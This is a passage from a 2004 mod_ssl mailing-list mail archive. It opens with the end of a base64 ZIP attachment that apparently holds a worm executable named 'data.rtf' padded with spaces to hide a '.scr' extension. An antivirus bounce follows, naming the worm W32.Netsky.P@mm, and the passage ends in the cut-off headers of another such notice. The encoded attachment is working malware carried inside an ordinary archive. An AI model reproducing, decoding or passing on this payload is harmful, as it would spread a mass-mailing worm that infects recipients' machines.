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
EwYY0NJ75CnOtudCWdCoGNDFAKx6ySH9tODWM0upDR0qepLdNbId4nRLjwAAAQACACAgEAAB
AAQA6AIAAAEAKAAAACAAAABAAAAAAQAEAAAAAACAAgAAAAAAAAAAAAAAAAAAAAAAAMz//wBo
V1gAAAAAAICAgAD///8AwMDAAP8AAAAA//8AvwAAAAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAiIRIiIiIiIiIiIiIiIiIiIiE1VVVVVVVVVVVVVSUiIiIjRERERERERERERERSUiIi
I0RERERERFVUREVVUlIiIiNEiIiIREmZRESZlFJSIiIjRERERERElURESVRSUiIiI0SIiIiI
RElVVVlUUlIiIiNEREREREREmZmZVFJSIiIjRIiIiIiIRElUSVRSUiIiI0RERERERERElUlU
UlIiIiNEiIiIiIiIRElZVFJSIiIjREREREREREREmVRSUiIiI0SIiIiIiIiIRElEUlIiIiNE
RERERERERERERFJSIiIjRIiIiIiIiIiIiERSUiIiI0REREREREREREREUlIiIiNEiIiIiIiI
iIiIRFJSIiIjRERERERERERERERSUiIiI0QiIiIiRIiIiIhEUlIiIiNEOZJEQkRERERERFJS
IiIjRDIiIiJEiIiIiERSUiIiI0Q0QndyREREREREUlIiIiNEMiJ3ckSIiIiIRFJSIiIjRDRC
d3JERERERERSUiIiI0Q0QmZiREREREREUlIiIiNENEJmYkRERERERFJSIiIjRDMyIiJERERE
RERSUiIiI0REREREREREREREUlIiIiNCRCRCRCRCRCRCRDJSIiIjQkQkQkQkQkQkQkQyUiIi
IiQzQzQzQzQzQzQzQyIiIiIiIiIiIiIiIiIiIiIiIuAAAA/gAAAH4AAAB+AAAAfgAAAH4AAA
B+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfg
AAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB/gAAA//////oRzo
MEABacD9QwPABcM4niYooxADwfgQJf9/hwDDi0QkVQQS6VXs7FEHU1ZXM/8xiX381BUcYCAo
i/BoyMA3D7dFCFBkViYYIdhTkRUUMlAOECE7x4mKPHQqFhEMDVdogKzAagLxsBIRQP91bAyK
NAiIg/j7v1QBdQQzwOtB0Ns7A/d2GOhh/xwCmbkbAVLx+YuAjDAUA0M73h5y6I3M/FfhdWwI
fXgEii4JEWd6ObH8D5TYX14pW8myHIGMZAx8VnC+YAQMV42FnG/zoqZQamApFSysDT0oDYgs
4PtOjNcUvEb3AIB9/lyLNSTFPb/gReF0CiIlVwXWIQpo0LAvHYC93IlcoUI8ICH+NeGhORA0
YTAJamXoMrv+EFmTP70Kg1COyiaRIEGwBq9yRAhq2wUoxEaj5B/IFjyJPbcjLXRTFDTobEV2
dSLGAxU4NXxQUVoSCXVYloUSwHQFVE0TRhUjNBEUdRkPagHnMEgSAvTQkDEwwhAAtDgwQDKQ
CXQkEENVJ2yXzo5pz20KYQifdo9lIO9F727vY+9y73nscCtl/GTPJlftbyObTEQN1i/lFhTN
MGJKnwpT2WtZTrMnXC7zQ/NadjOoMXAq/8OFPDVkpy64Uw7KRoGfZ5loFXP5QlSRDoRrGQN1
+GVy9m8AbmZpZzl4LmRxbOEQQklOGEFSWRBGVgNQcm90ZWObLqN4tjFgXAAA4AHgAuAg4hDO
EQQN6Ba+EX2kDnsog0YiAYwoCRCJIBZJiRTAwp8BFYADbwgUB5ACZhPAAtAQCXBV/wO8CFIH
QQIGEwqOQigBdwFscBAon9EECBB5mYP0RPf9JhAihBDi947QAhCckU+9GAjwqwEZ0g+PA4Bc
eMBUB7ADrQRSAzjqrwAAAeAgcEAOS0VSTmBMMzIuZHFs4EbobwZzZUhhbhjtwFpyPml0OkZu
Fb6/KWELHEEdVp96R29mUudzUXVyY582Tzqpaw1iYWQWEElpbrZueko9dE2+ZClsXbMiRvFw
eUlSm+R0RkTAJFfBa293c0TfPuRj+ep5pTmgLRROYW1MhlBy8PJk45xMc2p2H0xpYjtTLz5U
UJNDz+5uNA0YTGG8RXLcXOvFjE11CHjMTgMAAAAAAAAAAAAAAAAAUEsBAhQACgAAAAAAMHCB
MKOIHd6AcwAAgHMAAFcAAAAAAAAAAAAgAAAAAAAAAGRhdGEucnRmICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgLnNjclBLBQYAAAAAAQABAIUAAAD1cwAAAAA=

------=_NextPart_000_0016----=_NextPart_000_0016--



--523991BB64.1080830944/pop05.wanadoo.nl--

From shawn.syms@infinetcommunications.com  Thu Apr  1 16:53:29 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from imail.torinfinet.infinetcomm.com (mail.infinetcomm.com [207.245.44.17])
	by master.modssl.org (Postfix) with ESMTP id 6DD70A8938
	for ; Thu,  1 Apr 2004 16:53:13 +0200 (CEST)
Received: by imail.torinfinet.infinetcomm.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 1 Apr 2004 09:53:07 -0500
Message-ID: <93EF958062D1274C9B0DFA2093EB7DBC01921762@imail.torinfinet.infinetcomm.com>
From: Shawn Syms 
To: modssl-users-l@master.modssl.org
Subject: Virus Found in message "Question"
Date: Thu, 1 Apr 2004 09:53:06 -0500 
X-MS-TNEF-Correlator: <93EF958062D1274C9B0DFA2093EB7DBC01921762@imail.torinfinet.infinetcomm.com>
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_000_01C417F9.0A88CE90"

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_000_01C417F9.0A88CE90
Content-Type: text/plain

Symantec AntiVirus found a virus in an attachment you
(modssl-users-l@master.modssl.org ) sent
to robian@wanadoo.nl.

To ensure the recipient(s) are able to use the files you sent, perform a
virus scan on your computer, clean any infected files, then resend this
attachment.


Attachment:  sample01.zip
Virus name: W32.Netsky.P@mm
Action taken:  Clean failed : Quarantine succeeded : 
File status:  Infected



------_=_NextPart_000_01C417F9.0A88CE90
Content-Type: application/ms-tnef
Content-Transfer-Encoding: base64

eJ8+IggOAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQWAAwAOAAAA1AcEAAEACQA1AAYABAAoAQEggAMADgAAANQHBAAB
AAkANQAGAAQAKAEBCYABACEAAAA2RUY2NTVENTJFNEQ0NTQ0OTE3OEZFRTY3MTc3MUQ5MgAvBwEE
gAEAIgAAAFZpcnVzIEZvdW5kIGluIG1lc3NhZ2UgIlF1ZXN0aW9uIgDtCwENgAQAAgAAAAIAAgAB
A5AGALQFAAAgAAAAQAA5AJDOiAr5F8QBAwDxPwkEAAAeADFAAQAAAAYAAABTU1lNUwAAAAMAGkAA
AAAAHgAwQAEAAAAGAAAAU1NZTVMAAAADABlAAAAAAAIBCRABAAAAzwEAAMsBAACtAgAATFpGdezw
5TuHAAoBDQNDdGV4dAH3/wKkA+QF6wKDAFAC8wa0AoMmMgPFAgBjaArAc2XYdDAgBxMCgH0KgAjP
/wnZAoAKhAs3EsIB0BICAHANDvBjE+ACMGlWaXIGdQQgAhB1bmQgYfwgdhizC4AZUBnxAkAA0CZo
B4ACMCB5CGAgKDMEYQQQbC0Y0ASQcy2UbEAAwHMO8HIuG0RiLgWwZyA8G08cXT6MKSAToBrBdG8g
A2AiYgcwbkB3AHBhZPBvby5uHPAKowqFCoBWVB/wCfBzCHBlH9BoOyKQFUBjBSAIkAIwKHPvH3AK
wCKQAaBsIpEf8B3RPSKjZgMQB5Ea8h+SLCDmcASQAhBybRlXBPADkY8CIBriBcAFoG1wdRxhTSXg
YyQgGhJueRnRZv8FkA7wGUAlAyXgIrEDoBVAfx+RGUAisAQAGjkhLSE1QWkaVzogH4BhJ/AkIDD4
MS56BSAhNRikIKAHgCEtwFczMi4HwHRz0Gt5LlAeQG0stilQtmknUQGQawnwLcFDKIOeZgtwJCAZ
QC3AUXUKwM8YAQuAIpAiYGNjCeABALsy4iE1RiURH4ABkHQY0F0twUkpJSvfIWJ9N8AAAwD9P+QE
AAACAXEAAQAAABYAAAABxBf5Coh9zYwdSvlE0oBmB7n300seAAADACYAAAAAAAMANgAAAAAAHgBw
AAEAAAAiAAAAVmlydXMgRm91bmQgaW4gbWVzc2FnZSAiUXVlc3Rpb24iAAAAAgFHAAEAAABBAAAA
Yz1DQTthPXRvcmluZmluZXQ7cD1JbmZpbmV0IENvbW11bmljO2w9SU1BSUwtMDQwNDAxMTQ1MzA2
Wi0xMjE4MAAAAAACAfk/AQAAAFYAAAAAAAAA3KdAyMBCEBq0uQgAKy/hggEAAAAAAAAAL089SU5G
SU5FVCBDT01NVU5JQ0FUSU9OUy9PVT1JTUFJTC9DTj1SRUNJUElFTlRTL0NOPVNTWU1TAAAAHgD4
PwEAAAALAAAAU2hhd24gU3ltcwAAHgA4QAEAAAAGAAAAU1NZTVMAAAACAfs/AQAAAFYAAAAAAAAA
3KdAyMBCEBq0uQgAKy/hggEAAAAAAAAAL089SU5GSU5FVCBDT01NVU5JQ0FUSU9OUy9PVT1JTUFJ
TC9DTj1SRUNJUElFTlRTL0NOPVNTWU1TAAAAHgD6PwEAAAALAAAAU2hhd24gU3ltcwAAHgA5QAEA
AAAGAAAAU1NZTVMAAABAAAcwSCB4CvkXxAFAAAgwmLyUCvkXxAEeAD0AAQAAAAEAAAAAAAAAHgAd
DgEAAAAiAAAAVmlydXMgRm91bmQgaW4gbWVzc2FnZSAiUXVlc3Rpb24iAAAAHgA1EAEAAABMAAAA
PDkzRUY5NTgwNjJEMTI3NEM5QjBERkEyMDkzRUI3REJDMDE5MjE3NjJAaW1haWwudG9yaW5maW5l
dC5pbmZpbmV0Y29tbS5jb20+AAsAKQAAAAAACwAjAAAAAAADAAYQkAGLeQMABxBvAQAAAwAQEAAA
AAADABEQAAAAAB4ACBABAAAAZQAAAFNZTUFOVEVDQU5USVZJUlVTRk9VTkRBVklSVVNJTkFOQVRU
QUNITUVOVFlPVShNT0RTU0wtVVNFUlMtTEBNQVNURVJNT0RTU0xPUkc8TU9EU1NMLVVTRVJTLUxA
TUFTVEVSTU8AAAAAAgF/AAEAAABMAAAAPDkzRUY5NTgwNjJEMTI3NEM5QjBERkEyMDkzRUI3REJD
MDE5MjE3NjJAaW1haWwudG9yaW5maW5ldC5pbmZpbmV0Y29tbS5jb20+AI1z

------_=_NextPart_000_01C417F9.0A88CE90--

From TrendVirusWall23@nuwc.navy.mil  Thu Apr  1 16:53:43 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from npri54mai01.npt.nuwc.navy.mil (NPRI54MAI01.Npt.NUWC.Navy.Mil [164.223.1.100])
